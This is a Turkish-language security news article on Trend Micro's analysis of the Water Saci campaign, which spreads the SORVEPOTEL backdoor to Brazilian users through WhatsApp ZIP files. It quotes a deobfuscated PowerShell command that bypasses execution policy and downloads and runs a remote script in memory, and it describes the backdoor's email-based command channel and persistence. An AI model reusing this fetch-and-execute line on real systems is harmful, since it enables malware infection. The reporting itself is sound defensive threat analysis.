Brezilyalı kullanıcıları hedef alan, endişe verici yeteneklere sahip karmaşık bir kötü amaçlı yazılım kampanyası ortaya çıktı.
Trend Micro analistleri tarafından SORVEPOTEL kötü amaçlı yazılımından yararlandığı belirlenen Water Saci kampanyası, kurban ağları arasında hızlı yayılma için WhatsApp’ı birincil dağıtım vektörü olarak kullanıyor.
İlk olarak Eylül 2025’te tanımlanan kampanya, Ekim 2025’e kadar önemli ölçüde gelişti ve daha önce gözlemlenen .NET tabanlı yöntemlerden önemli ölçüde farklılaşan yeni bir komut dosyası tabanlı saldırı zincirini tanıttı.
Kötü amaçlı yazılım, çok vektörlü kalıcılık mekanizmaları ve saldırganlara güvenliği ihlal edilmiş sistemler üzerinde benzeri görülmemiş gerçek zamanlı operasyonel kontrol sağlayan gelişmiş komuta ve kontrol altyapısı aracılığıyla olağanüstü bir esneklik sergiliyor.
Trend Micro analistleri, kampanyanın kötü amaçlı ZIP dosyalarını ele geçirilen WhatsApp hesaplarıyla ilişkili tüm kişilere ve gruplara otomatik olarak dağıtarak üstel yayılma potansiyeli yarattığını belirledi.
8 Ekim 2025’te araştırmacılar, WhatsApp web oturumlarından kaynaklanan ve özellikle Orcamento-2025*.zip adlı dosyaları tanımlayan dosya indirmelerini ortaya çıkardı.
Gelişen zincir, geleneksel .NET ikili dosyalarını kullanmak yerine, Visual Basic Komut Dosyası indiricileri ve PowerShell komut dosyalarının bir kombinasyonu aracılığıyla yük dağıtımını düzenler ve geleneksel güvenlik algılama yöntemlerinden kaçan dosyasız yürütmeyi kolaylaştırır.
Bulaşma mekanizması, kullanıcıların Orcamento.vbs adlı karmaşık bir VBS indiricisi içeren kötü amaçlı ZIP arşivlerini indirip çıkarmasıyla başlar.
.webp)
Bu bileşen, New-Object Net.WebClient aracılığıyla dosyasız yürütme gerçekleştiren ve PowerShell tadeu.ps1 betiğini doğrudan belleğe indirip çalıştıran bir PowerShell komutunu yürütür.
Gizlemesi kaldırılmış kod şunları ortaya koyuyor: –
shell. Run "powershell -ep bypass ""[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;iex ((New-Object Net.WebClient).DownloadString('https://cld.pt/dl/download/ac23c304-aa9d-4d27-a845-272ec4de533d/sapotransfer-640a60194938bL1/tadeu.ps1?download=true'))"", 0, TrueE-posta Tabanlı Komuta Altyapısı ve Gelişmiş Kalıcılık
SORVEPOTEL arka kapısı, onu geleneksel bankacılık truva atlarından temel olarak ayıran gelişmiş bir çift kanallı iletişim mimarisi uygular.
Kötü amaçlı yazılım, geleneksel HTTP tabanlı komuta ve kontrol sistemlerine güvenmek yerine, operasyonel komutları almak için sabit kodlanmış kimlik bilgilerini kullanarak terra.com.br e-posta hesaplarına yapılan IMAP bağlantılarından yararlanıyor.
Bu e-posta tabanlı altyapı, olağanüstü bir dayanıklılık sağlayarak, birincil C&C sunucuları kesintiyle karşı karşıya kaldığında bile tehdit aktörlerinin kontrolü sürdürmesine olanak tanır.
C:\ProgramData\WindowsManager\’da WinManagers.vbs kullanılarak kayıt defteri değişiklikleri ve zamanlanmış görev oluşturma yoluyla kalıcılık sağlandıktan sonra, arka kapı, birincil veri uç noktaları, yedek altyapı URL’leri ve PowerShell verisi dağıtım bağlantıları da dahil olmak üzere birden fazla URL türünü çıkarmak için her otuz dakikada bir e-posta gelen kutularını sorgular.
Kötü amaçlı yazılım, ikincil iletişim kanalı olarak HTTP tabanlı bir yoklama sistemi kullanıyor ve get_commands eylem parametresiyle her beş saniyede bir çıkarılan C&C sunucularına POST istekleri gönderiyor.
Bu çok katmanlı yaklaşım, operatörlerin kampanya etkinliğini gerçek zamanlı olarak duraklatabilmesini, devam ettirebilmesini ve izleyebilmesini sağlayarak virüslü makineleri etkili bir şekilde koordineli bir botnet’e dönüştürebilir.
Arka kapı, sistem bilgisi toplama ve süreç yönetiminden ekran görüntüsü yakalama, dosya işlemleri ve sistem güç kontrolüne kadar yirmiden fazla farklı komutu çalıştırarak, saldırganlara SORVEPOTEL’i gelişmiş operasyonel esnekliğe ve Brezilya genelindeki finansal kurumlar ve işletmeler için yıkıcı potansiyele sahip tam özellikli bir arka kapı olarak konumlandıran kapsamlı uzaktan erişim yetenekleri sağlar.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
